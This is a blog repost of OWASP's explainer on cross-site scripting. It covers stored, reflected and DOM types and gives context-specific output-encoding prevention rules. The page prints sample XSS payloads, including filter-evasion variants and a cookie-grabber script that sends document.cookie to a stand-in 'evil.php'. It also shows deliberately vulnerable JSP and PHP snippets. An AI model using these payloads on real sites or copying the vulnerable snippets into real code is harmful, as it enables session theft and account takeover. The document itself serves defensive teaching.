Cross-site Scripting (XSS)

最新推荐文章于 2025-07-11 07:51:41 发布

转载最新推荐文章于 2025-07-11 07:51:41 发布 · 5.8k 阅读

Security 专栏收录该内容

19 篇文章

订阅专栏

本文详细介绍跨站脚本（XSS）攻击的概念、类型及其防御措施。包括如何通过正确的编码方式来预防不同类型的XSS攻击。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Overview

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws, see: Types of Cross-Site Scripting.

Description

Cross-Site Scripting (XSS) attacks occur when:

Data enters a Web application through an untrusted source, most frequently a web request.
The data is included in dynamic content that is sent to a web user without being validated for malicious content.

The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash, or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

Stored and Reflected XSS Attacks

XSS attacks can generally be categorized into two categories: stored and reflected. There is a third, much less well known type of XSS attack called DOM Based XSS that is discussed seperately here.

Stored XSS Attacks (AKA Persistent or Type I)

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS.

Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser. With the advent of HTML5, and other browser technologies, we can envision the attack payload being permanently stored in the victim’s browser, such as an HTML5 database, and never being sent to the server at all.

Reflected XSS Attacks (AKA Non-Persistent or Type II)

Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS.

DOM Based XSS (AKA Type-0)

DOM Based XSS is a form of XSS where the entire tainted data flow from source to sink takes place in the browser, i.e., the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. For example, the source (where malicious data is read) could be the URL of the page (e.g., document.location.href), or it could be an element of the HTML, and the sink is a sensitive method call that causes the execution of the malicious data (e.g., document.write)."

XSS Attack Consequences

The consequence of an XSS attack is the same regardless of whether it is stored or reflected (or DOM Based). The difference is in how the payload arrives at the server. Do not be fooled into thinking that a “read only” or “brochureware” site is not vulnerable to serious reflected XSS attacks. XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirect the user to some other page or site, or modify presentation of content. An XSS vulnerability allowing an attacker to modify a press release or news item could affect a company’s stock price or lessen consumer confidence. An XSS vulnerability on a pharmaceutical site could allow an attacker to modify dosage information resulting in an overdose. For more information on these types of attacks see Content_Spoofing.

How to Determine If You Are Vulnerable

XSS flaws can be difficult to identify and remove from a web application. The best way to find flaws is to perform a security review of the code and search for all places where input from an HTTP request could possibly make its way into the HTML output. Note that a variety of different HTML tags can be used to transmit a malicious JavaScript. Nessus, Nikto, and some other available tools can help scan a website for these flaws, but can only scratch the surface. If one part of a website is vulnerable, there is a high likelihood that there are other problems as well.

How to Protect Yourself

The primary defenses against XSS are described in the OWASP XSS Prevention Cheat Sheet.

Also, it's crucial that you turn off HTTP TRACE support on all webservers. An attacker can steal cookie data via Javascript even when document.cookie is disabled or not supported on the client. This attack is mounted when a user posts a malicious script to a forum so when another user clicks the link, an asynchronous HTTP Trace call is triggered which collects the user's cookie information from the server, and then sends it over to another malicious server that collects the cookie information so the attacker can mount a session hijack attack. This is easily mitigated by removing support for HTTP TRACE on all webservers.

The OWASP ESAPI project has produced a set of reusable security components in several languages, including validation and escaping routines to prevent parameter tampering and the injection of XSS attacks. In addition, the OWASP WebGoat Project training application has lessons on Cross-Site Scripting and data encoding.

Alternate XSS Syntax

XSS using Script in Attributes

XSS attacks may be conducted without using <script></script> tags.Other tags will do exactly the same thing, for example:

<body onload=alert('test1')>

or other attributes like: onmouseover, onerror.

onmouseover

<b onmouseover=alert('Wufff!')>click me!</b>

onerror

<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

XSS using Script Via Encoded URI Schemes

If we need to hide against web application filters we may try to encode string characters, e.g.: a=&#X41 (UTF-8) and use it inIMG tag:

<IMG SRC=j&#X41vascript:alert('test2')>

There are many different UTF-8 encoding notations what give us even more possibilities.

XSS using code encoding

We may encode our script in base64 and place it in META tag. This way we get rid of alert() totally. More information about this method can be found in RFC 2397

<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

These and others examples can be found at the OWASP XSS Filter Evasion Cheat Sheet which is a true encyclopedia of the alternate XSS syntax attack.

Examples

Cross-site scripting attacks may occur anywhere that possibly malicious users are allowed to post unregulated material to a trusted web site for the consumption of other valid users.

The most common example can be found in bulletin-board web sites which provide web based mailing list-style functionality.

Example 1

The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.

	<% String eid = request.getParameter("eid"); %> 
	...
	Employee ID: <%= eid %>

The code in this example operates correctly if eid contains only standard alphanumeric text. If eid has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers. This mechanism of exploiting vulnerable web applications is known as Reflected XSS.

Example 2

The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.

 
	<%... 
	 Statement stmt = conn.createStatement();
	 ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);
	 if (rs != null) {
	  rs.next(); 
	  String name = rs.getString("name");
	%>
	
	Employee Name: <%= name %>

As in Example 1, this code functions correctly when the values of name are well-behaved, but it does nothing to prevent exploits if they are not. Again, this code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser. This type of exploit, known as Stored XSS, is particularly insidious because the indirection caused by the data store makes it more difficult to identify the threat and increases the possibility that the attack will affect multiple users. XSS got its start in this form with web sites that offered a "guestbook" to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code.

As the examples demonstrate, XSS vulnerabilities are caused by code that includes unvalidated data in an HTTP response. There are three vectors by which an XSS attack can reach a victim:

As in Example 1, data is read directly from the HTTP request and reflected back in the HTTP response. Reflected XSS exploits occur when an attacker causes a user to supply dangerous content to a vulnerable web application, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces victims to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the user, the content is executed and proceeds to transfer private information, such as cookies that may include session information, from the user's machine to the attacker or perform other nefarious activities.
As in Example 2, the application stores dangerous data in a database or other trusted data store. The dangerous data is subsequently read back into the application and included in dynamic content. Stored XSS exploits occur when an attacker injects dangerous content into a data store that is later read and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user.
A source outside the application stores dangerous data in a database or other data store, and the dangerous data is subsequently read back into the application as trusted data and included in dynamic content.

Attack Examples

Example 1 : Cookie Grabber

If the application doesn't validate the input data, the attacker can easily steal a cookie from an authenticated user. All the attacker has to do is to place the following code in any posted input(ie: message boards, private messages, user profiles):

<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>

The above code will pass an escaped content of the cookie (according to RFC content must be escaped before sending it via HTTP protocol with GET method) to the evil.php script in "cakemonster" variable. The attacker then checks the results of his evil.php script (a cookie grabber script will usually write the cookie to a file) and use it.

Error Page Example

Let's assume that we have an error page, which is handling requests for a non existing pages, a classic 404 errorpage. We may use the code below as an example to inform user about what specific page is missing:

<html>
<body>

<? php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>

</body>
</html>

Let's see how it works:

http://testsite.test/file_which_not_exist

In response we get:

Not found: /file_which_not_exist

Now we will try to force the error page to include our code:

http://testsite.test/<script>alert("TEST");</script>

The result is:

Not found: / (but with JavaScript code <script>alert("TEST");</script>)

We have successfully injected the code, our XSS! What does it mean? For example, that wemay use this flaw to try to steal a user's session cookie.

Types of Cross-Site Scripting

For years, most people thought of these (Stored, Reflected, DOM) as three different types of XSS, but in reality, they overlap. You can have both Stored and Reflected DOM Based XSS. You can also have Stored and Reflected Non-DOM Based XSS too, but that’s confusing, so to help clarify things, starting about mid 2012, the research community proposed and started using two new terms to help organize the types of XSS that can occur:

Server XSS
Client XSS

Server XSS

Server XSS occurs when untrusted user supplied data is included in an HTML response generated by the server. The source of this data could be from the request, or from a stored location. As such, you can have both Reflected Server XSS and Stored Server XSS.

In this case, the entire vulnerability is in server-side code, and the browser is simply rendering the response and executing any valid script embedded in it.

Client XSS

Client XSS occurs when untrusted user supplied data is used to update the DOM with an unsafe JavaScript call. A JavaScript call is considered unsafe if it can be used to introduce valid JavaScript into the DOM. This source of this data could be from the DOM, or it could have been sent by the server (via an AJAX call, or a page load). The ultimate source of the data could have been from a request, or from a stored location on the client or the server. As such, you can have both Reflected Client XSS and Stored Client XSS.

With these new definitions, the definition of DOM Based XSS doesn’t change. DOM Based XSS is simply a subset of Client XSS, where the source of the data is somewhere in the DOM, rather than from the Server.

Given that both Server XSS and Client XSS can be Stored or Reflected, this new terminology results in a simple, clean, 2 x 2 matrix with Client & Server XSS on one axis, and Stored and Reflected XSS on the other axis as depicted here:

Recommended Server XSS Defenses

Server XSS is caused by including untrusted data in an HTML response. The easiest and strongest defense against Server XSS in most cases is:

Context-sensitive server side output encoding

The details on how to implement Context-sensitive server side output encoding are presented in the OWASP XSS (Cross Site Scripting) Prevention Cheat Sheet in great detail.

Input validation or data sanitization can also be performed to help prevent Server XSS, but it’s much more difficult to get correct than context-sensitive output encoding.

Recommended Client XSS Defenses

Client XSS is caused when untrusted data is used to update the DOM with an unsafe JavaScript call. The easiest and strongest defense against Client XSS is:

Using safe JavaScript APIs

However, developers frequently don’t know which JavaScript APIs are safe or not, never mind which methods in their favorite JavaScript library are safe. Some information on which JavaScript and jQuery methods are safe and unsafe is presented in Dave Wichers’ DOM Based XSS talk presented at OWASP AppSec USA in 2012: Unraveling some of the Mysteries around DOM Based XSS

If you know that a JavaScript method is unsafe, our primary recommendation is to find an alternative safe method to use. If you can’t for some reason, then context sensitive output encoding can be done in the browser, before passing that data to the unsafe JavaScript method. OWASP’s guidance on how do this properly is presented in the DOM based XSS Prevention Cheat Sheet. Note that this guidance is applicable to all types of Client XSS, regardless of where the data actually comes from (DOM or Server).

This article provides a simple positive model for preventing XSS using output escaping/encoding properly. While there are a huge number of XSS attack vectors, following a few simple rules can completely defend against this serious attack. This article does not explore the technical or business impact of XSS. Suffice it to say that it can lead to an attacker gaining the ability to do anything a victim can do through their browser.

A Positive XSS Prevention Model

This article treats an HTML page like a template, with slots where a developer is allowed to put untrusted data. These slots cover the vast majority of the common places where a developer might want to put untrusted data. Putting untrusted data in other places in the HTML is not allowed. This is a "whitelist" model, that denies everything that is not specifically allowed.

Given the way browsers parse HTML, each of the different types of slots has slightly different security rules. When you put untrusted data into these slots, you need to take certain steps to make sure that the data does not break out of that slot into a context that allows code execution. In a way, this approach treats an HTML document like a parameterized database query - the data is kept in specific places and is isolated from code contexts with escaping.

This document sets out the most common types of slots and the rules for putting untrusted data into them safely. Based on the various specifications, known XSS vectors, and a great deal of manual testing with all the popular browsers, we have determined that the rule proposed here are safe.

The slots are defined and a few examples of each are provided. Developers SHOULD NOT put data into any other slots without a very careful analysis to ensure that what they are doing is safe. Browser parsing is extremely tricky and many innocuous looking characters can be significant in the right context.

Why Can't I Just HTML Entity Encode Untrusted Data?

HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a <div> tag. It even sort of works for untrusted data that goes into attributes, particularly if you're religious about using quotes around your attributes. But HTML entity encoding doesn't work if you're putting untrusted data inside a <script> tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into. That's what the rules below are all about.

You Need a Security Encoding Library

Writing these encoders is not tremendously difficult, but there are quite a few hidden pitfalls. For example, you might be tempted to use some of the escaping shortcuts like \" in JavaScript. However, these values are dangerous and may be misinterpreted by the nested parsers in the browser. You might also forget to escape the escape character, which attackers can use to neutralize your attempts to be safe. OWASP recommends using a security-focused encoding library to make sure these rules are properly implemented.

Microsoft provides an encoding library named the Microsoft Anti-Cross Site Scripting Library for the .NET platform and ASP.NET Framework has built-in ValidateRequest function that provides limited sanitization.

The OWASP ESAPI project has created an escaping library for Java. OWASP also provides the OWASP Java Encoder Project for high-performance encoding.

XSS Prevention Rules

The following rules are intended to prevent all XSS in your application. While these rules do not allow absolute freedom in putting untrusted data into an HTML document, they should cover the vast majority of common use cases. You do not have to allow all the rules in your organization. Many organizations may find that allowing only Rule #1 and Rule #2 are sufficient for their needs. Please add a note to the discussion page if there is an additional context that is often required and can be secured with escaping.

Do NOT simply escape the list of example characters provided in the various rules. It is NOT sufficient to escape only that list. Blacklist approaches are quite fragile. The whitelist rules here have been carefully designed to provide protection even against future vulnerabilities introduced by browser changes.

RULE #0 - Never Insert Untrusted Data Except in Allowed Locations

The first rule is to deny all - don't put untrusted data into your HTML document unless it is within one of the slots defined in Rule #1 through Rule #5. The reason for Rule #0 is that there are so many strange contexts within HTML that the list of escaping rules gets very complicated. We can't think of any good reason to put untrusted data in these contexts. This includes "nested contexts" like a URL inside a javascript -- the encoding rules for those locations are tricky and dangerous. If you insist on putting untrusted data into nested contexts, please do a lot of cross-browser testing and let us know what you find out.

 <script>...NEVER PUT UNTRUSTED DATA HERE...</script>   directly in a script
 
 <!--...NEVER PUT UNTRUSTED DATA HERE...-->             inside an HTML comment
 
 <div ...NEVER PUT UNTRUSTED DATA HERE...=test />       in an attribute name
 
 <NEVER PUT UNTRUSTED DATA HERE... href="/test" />   in a tag name
 
 <style>...NEVER PUT UNTRUSTED DATA HERE...</style>   directly in CSS

Most importantly, never accept actual JavaScript code from an untrusted source and then run it. For example, a parameter named "callback" that contains a JavaScript code snippet. No amount of escaping can fix that.

RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content

Rule #1 is for when you want to put untrusted data directly into the HTML body somewhere. This includes inside normal tags like div, p, b, td, etc. Most web frameworks have a method for HTML escaping for the characters detailed below. However, this is absolutely not sufficient for other HTML contexts. You need to implement the other rules detailed here as well.

 <body>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</body>
 
 <div>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...</div>
 
 any other normal HTML elements

Escape the following characters with HTML entity encoding to prevent switching into any execution context, such as script, style, or event handlers. Using hex entities is recommended in the spec. In addition to the 5 characters significant in XML (&, <, >, ", '), the forward slash is included as it helps to end an HTML entity.

 & --> &amp;
 < --> &lt;
 > --> &gt;
 " --> &quot;
 ' --> &#x27;     &apos; not recommended because its not in the HTML spec (See: section 24.4.1) &apos; is in the XML and XHTML specs.
 / --> &#x2F;     forward slash is included as it helps end an HTML entity

See the ESAPI reference implementation of HTML entity escaping and unescaping.

 String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );

RULE #2 - Attribute Escape Before Inserting Untrusted Data into HTML Common Attributes

Rule #2 is for putting untrusted data into typical attribute values like width, name, value, etc. This should not be used for complex attributes like href, src, style, or any of the event handlers like onmouseover. It is extremely important that event handler attributes should follow Rule #3 for HTML JavaScript Data Values.

 <div attr=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...>content</div>     inside UNquoted attribute
 
 <div attr='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'>content</div>   inside single quoted attribute
 
 <div attr="...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">content</div>   inside double quoted attribute

Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the &#xHH; format (or a named entity if available) to prevent switching out of the attribute. The reason this rule is so broad is that developers frequently leave attributes unquoted. Properly quoted attributes can only be escaped with the corresponding quote. Unquoted attributes can be broken out of with many characters, including [space] % * + , - / ; < = > ^ and |.

See the ESAPI reference implementation of HTML entity escaping and unescaping.

 String safe = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) );

RULE #3 - JavaScript Escape Before Inserting Untrusted Data into JavaScript Data Values

Rule #3 concerns dynamically generated JavaScript code - both script blocks and event-handler attributes. The only safe place to put untrusted data into this code is inside a quoted "data value." Including untrusted data inside any other JavaScript context is quite dangerous, as it is extremely easy to switch into an execution context with characters including (but not limited to) semi-colon, equals, space, plus, and many more, so use with caution.

 <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>     inside a quoted string
 
 <script>x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'</script>          one side of a quoted expression
 
 <div onmouseover="x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'"</div>  inside quoted event handler

Please note there are some JavaScript functions that can never safely use untrusted data as input - EVEN IF JAVASCRIPT ESCAPED!

For example:

 <script>
 window.setInterval('...EVEN IF YOU ESCAPE UNTRUSTED DATA YOU ARE XSSED HERE...');
 </script>

Except for alphanumeric characters, escape all characters less than 256 with the \xHH format to prevent switching out of the data value into the script context or into another attribute. DO NOT use any escaping shortcuts like \" because the quote character may be matched by the HTML attribute parser which runs first. These escaping shortcuts are also susceptible to "escape-the-escape" attacks where the attacker sends \" and the vulnerable code turns that into \\" which enables the quote.

If an event handler is properly quoted, breaking out requires the corresponding quote. However, we have intentionally made this rule quite broad because event handler attributes are often left unquoted. Unquoted attributes can be broken out of with many characters including [space] % * + , - / ; < = > ^ and |. Also, a </script> closing tag will close a script block even though it is inside a quoted string because the HTML parser runs before the JavaScript parser.

See the ESAPI reference implementation of JavaScript escaping and unescaping.

 String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );

RULE #3.1 - HTML escape JSON values in an HTML context and read the data with JSON.parse

In a Web 2.0 world, the need for having data dynamically generated by an application in a javascript context is common. One strategy is to make an AJAX call to get the values, but this isn't always performant. Often, an initial block of JSON is loaded into the page to act as a single place to store multiple values. This data is tricky, though not impossible, to escape correctly without breaking the format and content of the values.

Ensure returned Content-Type header is application/json and not text/html. This shall instruct the browser not misunderstand the context and execute injected script

Bad HTTP response:

   HTTP/1.1 200
   Date: Wed, 06 Feb 2013 10:28:54 GMT
   Server: Microsoft-IIS/7.5....
   Content-Type: text/html; charset=utf-8 <-- bad
   ....
   Content-Length: 373
   Keep-Alive: timeout=5, max=100
   Connection: Keep-Alive
   {"Message":"No HTTP resource was found that matches the request URI 'dev.net.ie/api/pay/.html?HouseNumber=9&AddressLine
   =The+Gardens<script>alert(1)</script>&AddressLine2=foxlodge+woods&TownName=Meath'.","MessageDetail":"No type was found
   that matches the controller named 'pay'."}   <-- this script will pop!!

Good HTTP response

   HTTP/1.1 200
   Date: Wed, 06 Feb 2013 10:28:54 GMT
   Server: Microsoft-IIS/7.5....
   Content-Type: application/json; charset=utf-8 <--good
   .....
   .....

A common anti-pattern one would see:

   <script>
     var initData = <%= data.to_json %>; // Do NOT do this without encoding the data with one of the techniques listed below.
   </script>

JSON entity encoding

The rules for JSON encoding can be found in the Output Encoding Rules Summary. Note, this will not allow you to use XSS protection provided by CSP 1.0.

HTML entity encoding

This technique has the advantage that html entity escaping is widely supported and helps separate data from server side code without crossing any context boundaries. Consider placing the JSON block on the page as a normal element and then parsing the innerHTML to get the contents. The javascript that reads the span can live in an external file, thus making the implementation of CSP enforcement easier.

 <script id="init_data" type="application/json">
    <%= html_escape(data.to_json) %>
 </script>

 // external js file
 var dataElement = document.getElementById('init_data');
 // unescape the content of the span
 var jsonText = dataElement.textContent || dataElement.innerText  
 var initData = JSON.parse(html_unescape(jsonText));

An alternative to escaping and unescaping JSON directly in JavaScript, is to normalize JSON server-side by converting '<' to '\u003c' before delivering it to the browser.

RULE #4 - CSS Escape And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values

Rule #4 is for when you want to put untrusted data into a stylesheet or a style tag. CSS is surprisingly powerful, and can be used for numerous attacks. Therefore, it's important that you only use untrusted data in a property value and not into other places in style data. You should stay away from putting untrusted data into complex properties like url, behavior, and custom (-moz-binding). You should also not put untrusted data into IE’s expression property value which allows JavaScript.

 <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>     property value

 <style>selector { property : "...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE..."; } </style>   property value

 <span style="property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">text</span>       property value

Please note there are some CSS contexts that can never safely use untrusted data as input - EVEN IF PROPERLY CSS ESCAPED! You will have to ensure that URLs only start with "http" not "javascript" and that properties never start with "expression".

For example:

 { background-url : "javascript:alert(1)"; }  // and all other URLs
 { text-size: "expression(alert('XSS'))"; }   // only in IE

Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the \HH escaping format. DO NOT use any escaping shortcuts like \" because the quote character may be matched by the HTML attribute parser which runs first. These escaping shortcuts are also susceptible to "escape-the-escape" attacks where the attacker sends \" and the vulnerable code turns that into \\" which enables the quote.

If attribute is quoted, breaking out requires the corresponding quote. All attributes should be quoted but your encoding should be strong enough to prevent XSS when untrusted data is placed in unquoted contexts. Unquoted attributes can be broken out of with many characters including [space] % * + , - / ; < = > ^ and |. Also, the </style> tag will close the style block even though it is inside a quoted string because the HTML parser runs before the JavaScript parser. Please note that we recommend aggressive CSS encoding and validation to prevent XSS attacks for both quoted and unquoted attributes.

See the ESAPI reference implementation of CSS escaping and unescaping.

 String safe = ESAPI.encoder().encodeForCSS( request.getParameter( "input" ) );

RULE #5 - URL Escape Before Inserting Untrusted Data into HTML URL Parameter Values

Rule #5 is for when you want to put untrusted data into HTTP GET parameter value.

 <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the %HH escaping format. Including untrusted data in data: URLs should not be allowed as there is no good way to disable attacks with escaping to prevent switching out of the URL. All attributes should be quoted. Unquoted attributes can be broken out of with many characters including [space] % * + , - / ; < = > ^ and |. Note that entity encoding is useless in this context.

See the ESAPI reference implementation of URL escaping and unescaping.

 String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) );

WARNING: Do not encode complete or relative URL's with URL encoding! If untrusted input is meant to be placed into href, src or other URL-based attributes, it should be validated to make sure it does not point to an unexpected protocol, especially Javascript links. URL's should then be encoded based on the context of display like any other piece of data. For example, user driven URL's in HREF links should be attribute encoded. For example:

 String userURL = request.getParameter( "userURL" )
 boolean isValidURL = ESAPI.validator().isValidInput("URLContext", userURL, "URL", 255, false); 
 if (isValidURL) {  
     <a href="<%=encoder.encodeForHTMLAttribute(userURL)%>">link</a>
 }

RULE #6 - Sanitize HTML Markup with a Library Designed for the Job

If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text. There are several available at OWASP that are simple to use:

OWASP AntiSamy - https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project

  import org.owasp.validator.html.*;
  Policy policy = Policy.getInstance(POLICY_FILE_LOCATION);
  AntiSamy as = new AntiSamy();
  CleanResults cr = as.scan(dirtyInput, policy);
  MyUserDAO.storeUserProfile(cr.getCleanHTML()); // some custom function

OWASP Java HTML Sanitizer - https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project

  import org.owasp.html.Sanitizers;
  import org.owasp.html.PolicyFactory;
  PolicyFactory sanitizer = Sanitizers.FORMATTING.and(Sanitizers.BLOCKS);
  String cleanResults = sanitizer.sanitize("<p>Hello, <b>World!</b>");

For more information on OWASP Java HTML Sanitizer policy construction, see http://owasp-java-html-sanitizer.googlecode.com/svn/trunk/distrib/javadoc/org/owasp/html/Sanitizers.html

Other libraries that provide HTML Sanitization include:

PHP Html Purifier - http://htmlpurifier.org/
JavaScript/Node.JS Bleach - https://github.com/ecto/bleach
Python Bleach - https://pypi.python.org/pypi/bleach

RULE #7 - Prevent DOM-based XSS

For details on what DOM-based XSS is, and defenses against this type of XSS flaw, please see the OWASP article on DOM based XSS Prevention Cheat Sheet.

Bonus Rule #1: Use HTTPOnly cookie flag

Preventing all XSS flaws in an application is hard, as you can see. To help mitigate the impact of an XSS flaw on your site, OWASP also recommends you set the HTTPOnly flag on your session cookie and any custom cookies you have that are not accessed by any Javascript you wrote. This cookie flag is typically on by default in .NET apps, but in other languages you have to set it manually. For more details on the HTTPOnly cookie flag, including what it does, and how to use it, see the OWASP article on HTTPOnly.

Bonus Rule #2: Implement Content Security Policy

There is another good complex solution to mitigate the impact of an XSS flaw called Content Security Policy. It's a browser side mechanism which allows you to create source whitelists for client side resources of your web application, e.g. JavaScript, CSS, images, etc. CSP via special HTTP header instructs the browser to only execute or render resources from those sources. For example this CSP

Content-Security-Policy: default-src: 'self'; script-src: 'self' static.domain.tld

will instruct web browser to load all resources only from the page's origin and JavaScript source code files additionaly from static.domain.tld. For more details on Content Security Policy, including what it does, and how to use it, see the OWASP article on Content_Security_Policy

XSS Prevention Rules Summary

The following snippets of HTML demonstrate how to safely render untrusted data in a variety of different contexts.

Data Type	Context	Code Sample	Defense
String	HTML Body	<span>UNTRUSTED DATA</span>	HTML Entity Encoding
String	Safe HTML Attributes	<input type="text" name="fname" value="UNTRUSTED DATA">	Aggressive HTML Entity Encoding Only place untrusted data into a whitelist of safe attributes (listed below). Strictly validate unsafe attributes such as background, id and name.
String	GET Parameter	<a href="/site/search?value=UNTRUSTED DATA">clickme</a>	URL Encoding
String	Untrusted URL in a SRC or HREF attribute	<a href="UNTRUSTED URL">clickme</a> <iframe src="UNTRUSTED URL" />	Canonicalize input URL Validation Safe URL verification Whitelist http and https URL's only (Avoid the JavaScript Protocol to Open a new Window) Attribute encoder
String	CSS Value	<div style="width: UNTRUSTED DATA;">Selection</div>	Strict structural validation CSS Hex encoding Good design of CSS Features
String	JavaScript Variable	<script>var currentValue='UNTRUSTED DATA';</script> <script>someFunction('UNTRUSTED DATA');</script>	Ensure JavaScript variables are quoted JavaScript Hex Encoding JavaScript Unicode Encoding Avoid backslash encoding (\" or \' or \\)
HTML	HTML Body	<div>UNTRUSTED HTML</div>	HTML Validation (JSoup, AntiSamy, HTML Sanitizer)
String	DOM XSS	<script>document.write("UNTRUSTED INPUT: " + document.location.hash);<script/>	DOM based XSS Prevention Cheat Sheet

Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width

Output Encoding Rules Summary

The purpose of output encoding (as it relates to Cross Site Scripting) is to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. The following charts details a list of critical output encoding methods needed to stop Cross Site Scripting.

Encoding Type	Encoding Mechanism
HTML Entity Encoding	Convert & to & Convert < to < Convert > to > Convert " to " Convert ' to ' Convert / to /
HTML Attribute Encoding	Except for alphanumeric characters, escape all characters with the HTML Entity &#xHH; format, including spaces. (HH = Hex Value)
URL Encoding	Standard percent encoding, see: http://www.w3schools.com/tags/ref_urlencode.asp. URL encoding should only be used to encode parameter values, not the entire URL or path fragments of a URL.
JavaScript Encoding	Except for alphanumeric characters, escape all characters with the \uXXXX unicode escaping format (X = Integer).
CSS Hex Encoding	CSS escaping supports \XX and \XXXXXX. Using a two character escape can cause problems if the next character continues the escape sequence. There are two solutions (a) Add a space after the CSS escape (will be ignored by the CSS parser) (b) use the full amount of CSS escaping possible by zero padding the value.